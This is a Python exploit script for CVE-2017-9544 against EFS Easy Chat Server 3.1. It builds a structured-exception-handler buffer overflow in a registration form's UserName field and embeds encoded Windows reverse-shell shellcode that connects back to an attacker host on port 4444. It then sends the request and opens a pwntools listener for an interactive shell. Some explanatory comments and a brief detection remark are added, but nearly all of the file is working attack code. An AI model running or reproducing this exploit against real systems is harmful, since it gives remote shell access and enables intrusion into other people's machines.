#!/usr/bin/env python
#
# CVE-2017-9544 exploit based on:
# * pwntools
# * metasploit reverse_tcp payload
# * EFS Easy Chat Server 3.1 from https://www.exploit-db.com/exploits/42155
import pwn
import requests
import urllib
from threading import Thread
def generate_payload():
    """Build the URL-encoded form body sent to the registration endpoint.

    The UserName field carries the whole buffer: 217 filler bytes, a short
    forward jump, the fixed SE_handler address, then the msfvenom-encoded
    reverse-shell shellcode. Every other form field is a fixed dummy value.

    Returns the ``params`` template with the buffer substituted into
    ``UserName``. No network access happens here. Written against the
    Python 2 API (``urllib.quote_plus``, str-based byte handling).
    """
    params = "UserName={}&Password=test&Password1=test&Sex=1&Email=x@&" \
        + "Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin" \
        + "&submit1=Register"
    # Fixed address, packed little-endian; the name and EXITFUNC=seh below
    # suggest it is written over the exception-handler pointer. It is specific
    # to the build named in the file header and is not verifiable from here.
    SE_handler = pwn.p32(0x10017f21)
    payload = 'A' * 217
    payload += pwn.asm("jmp $+16; nop; nop") # trampoline over few bytes
    payload += SE_handler
    # msfvenom -p windows/shell_reverse_tcp EXITFUNC=seh LHOST=192.168.15.101
    # LPORT=4444 -f python -v shellcode -a x86 --platform windows
    # -e x86/alpha_mixed
    # NOTE: LHOST/LPORT are baked into these bytes at generation time; the
    # LPORT assigned in __main__ only configures the local listener.
    shellcode = "\x90" * 10   # NOP sled; 16 bytes past the jmp lands inside it
    shellcode += "\x89\xe1\xd9\xc8\xd9\x71\xf4\x5e\x56\x59\x49\x49"
    shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
    shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
    shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
    shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    shellcode += "\x4b\x4c\x4d\x38\x6c\x42\x67\x70\x43\x30\x55\x50"
    shellcode += "\x55\x30\x6f\x79\x6d\x35\x70\x31\x79\x50\x73\x54"
    shellcode += "\x6c\x4b\x66\x30\x30\x30\x4c\x4b\x71\x42\x76\x6c"
    shellcode += "\x6e\x6b\x52\x72\x34\x54\x6c\x4b\x32\x52\x36\x48"
    shellcode += "\x54\x4f\x4e\x57\x53\x7a\x51\x36\x64\x71\x49\x6f"
    shellcode += "\x6e\x4c\x47\x4c\x55\x31\x33\x4c\x74\x42\x64\x6c"
    shellcode += "\x37\x50\x59\x51\x48\x4f\x36\x6d\x47\x71\x79\x57"
    shellcode += "\x79\x72\x38\x72\x33\x62\x71\x47\x4e\x6b\x52\x72"
    shellcode += "\x36\x70\x6e\x6b\x72\x6a\x55\x6c\x4e\x6b\x42\x6c"
    shellcode += "\x44\x51\x70\x78\x38\x63\x71\x58\x73\x31\x58\x51"
    shellcode += "\x52\x71\x6e\x6b\x46\x39\x55\x70\x63\x31\x48\x53"
    shellcode += "\x6e\x6b\x30\x49\x62\x38\x59\x73\x77\x4a\x70\x49"
    shellcode += "\x6c\x4b\x64\x74\x4c\x4b\x55\x51\x59\x46\x76\x51"
    shellcode += "\x69\x6f\x4c\x6c\x79\x51\x48\x4f\x76\x6d\x33\x31"
    shellcode += "\x5a\x67\x50\x38\x59\x70\x43\x45\x4b\x46\x47\x73"
    shellcode += "\x53\x4d\x79\x68\x35\x6b\x43\x4d\x37\x54\x70\x75"
    shellcode += "\x6a\x44\x52\x78\x4c\x4b\x32\x78\x67\x54\x47\x71"
    shellcode += "\x6e\x33\x50\x66\x4e\x6b\x46\x6c\x70\x4b\x4e\x6b"
    shellcode += "\x71\x48\x55\x4c\x35\x51\x79\x43\x6e\x6b\x67\x74"
    shellcode += "\x4e\x6b\x45\x51\x38\x50\x6b\x39\x32\x64\x65\x74"
    shellcode += "\x67\x54\x53\x6b\x61\x4b\x75\x31\x56\x39\x73\x6a"
    shellcode += "\x50\x51\x69\x6f\x4b\x50\x43\x6f\x33\x6f\x52\x7a"
    shellcode += "\x4c\x4b\x54\x52\x38\x6b\x6c\x4d\x31\x4d\x72\x48"
    shellcode += "\x35\x63\x75\x62\x73\x30\x35\x50\x50\x68\x63\x47"
    shellcode += "\x52\x53\x66\x52\x63\x6f\x53\x64\x51\x78\x70\x4c"
    shellcode += "\x30\x77\x76\x46\x75\x57\x6b\x4f\x4b\x65\x4e\x58"
    shellcode += "\x6a\x30\x45\x51\x73\x30\x53\x30\x77\x59\x59\x54"
    shellcode += "\x31\x44\x56\x30\x70\x68\x64\x69\x6f\x70\x72\x4b"
    shellcode += "\x73\x30\x6b\x4f\x39\x45\x62\x70\x30\x50\x56\x30"
    shellcode += "\x70\x50\x43\x70\x70\x50\x37\x30\x66\x30\x63\x58"
    shellcode += "\x5a\x4a\x44\x4f\x59\x4f\x59\x70\x39\x6f\x79\x45"
    shellcode += "\x4a\x37\x51\x7a\x34\x45\x55\x38\x6b\x70\x79\x38"
    shellcode += "\x74\x4f\x73\x55\x63\x58\x34\x42\x55\x50\x37\x61"
    shellcode += "\x71\x4c\x4e\x69\x38\x66\x51\x7a\x52\x30\x72\x76"
    shellcode += "\x56\x37\x53\x58\x6a\x39\x6e\x45\x31\x64\x55\x31"
    shellcode += "\x59\x6f\x4a\x75\x6f\x75\x69\x50\x34\x34\x66\x6c"
    shellcode += "\x79\x6f\x32\x6e\x34\x48\x62\x55\x7a\x4c\x32\x48"
    shellcode += "\x5a\x50\x4e\x55\x4c\x62\x53\x66\x4b\x4f\x5a\x75"
    shellcode += "\x30\x68\x53\x53\x62\x4d\x71\x74\x57\x70\x6b\x39"
    shellcode += "\x4b\x53\x56\x37\x70\x57\x50\x57\x46\x51\x48\x76"
    shellcode += "\x32\x4a\x42\x32\x62\x79\x36\x36\x4b\x52\x79\x6d"
    shellcode += "\x35\x36\x4f\x37\x51\x54\x44\x64\x45\x6c\x53\x31"
    shellcode += "\x35\x51\x4e\x6d\x73\x74\x37\x54\x56\x70\x49\x56"
    shellcode += "\x57\x70\x33\x74\x66\x34\x30\x50\x63\x66\x56\x36"
    shellcode += "\x33\x66\x70\x46\x76\x36\x32\x6e\x66\x36\x51\x46"
    shellcode += "\x56\x33\x50\x56\x72\x48\x43\x49\x38\x4c\x55\x6f"
    shellcode += "\x4d\x56\x39\x6f\x49\x45\x6f\x79\x6d\x30\x62\x6e"
    shellcode += "\x72\x76\x42\x66\x39\x6f\x34\x70\x73\x58\x73\x38"
    shellcode += "\x6f\x77\x47\x6d\x73\x50\x4b\x4f\x78\x55\x6d\x6b"
    shellcode += "\x4b\x4e\x54\x4e\x70\x32\x58\x6a\x32\x48\x4f\x56"
    shellcode += "\x6d\x45\x4f\x4d\x6f\x6d\x49\x6f\x4a\x75\x65\x6c"
    shellcode += "\x55\x56\x61\x6c\x74\x4a\x4d\x50\x79\x6b\x79\x70"
    shellcode += "\x72\x55\x66\x65\x6d\x6b\x51\x57\x45\x43\x44\x32"
    shellcode += "\x72\x4f\x51\x7a\x53\x30\x33\x63\x6b\x4f\x4a\x75"
    shellcode += "\x41\x41"
    payload += shellcode
    # Detection note: a POST to /registresult.htm whose UserName value runs to
    # hundreds of bytes is the on-the-wire signature of this request.
    return params.format(urllib.quote_plus(payload))
def attack():
    """Send the single registration POST carrying the crafted UserName field.

    RHOST and RPORT are read from the module namespace (assigned in
    ``__main__``); the HTTP response is discarded. From a monitoring point of
    view this is one POST to /registresult.htm with an oversized body.
    """
    target = "http://{host}:{port}/registresult.htm".format(host=RHOST, port=RPORT)
    requests.post(target, data=generate_payload())
if __name__ == "__main__":
    # set target info
    RHOST = '192.168.15.100'
    RPORT = 80
    LPORT = 4444
    # The request goes out on a worker thread so this thread is free to run
    # the listener that waits for the target to connect back.
    thread = Thread(target=attack)
    thread.start()
    # Local listener for the reverse shell. The shellcode in generate_payload
    # was generated for LPORT=4444 (see its msfvenom comment), which is the
    # port bound here; LPORT does not alter the shellcode itself.
    listener = pwn.listen(port=LPORT)
    listener.wait_for_connection()
    listener.interactive()
    thread.join()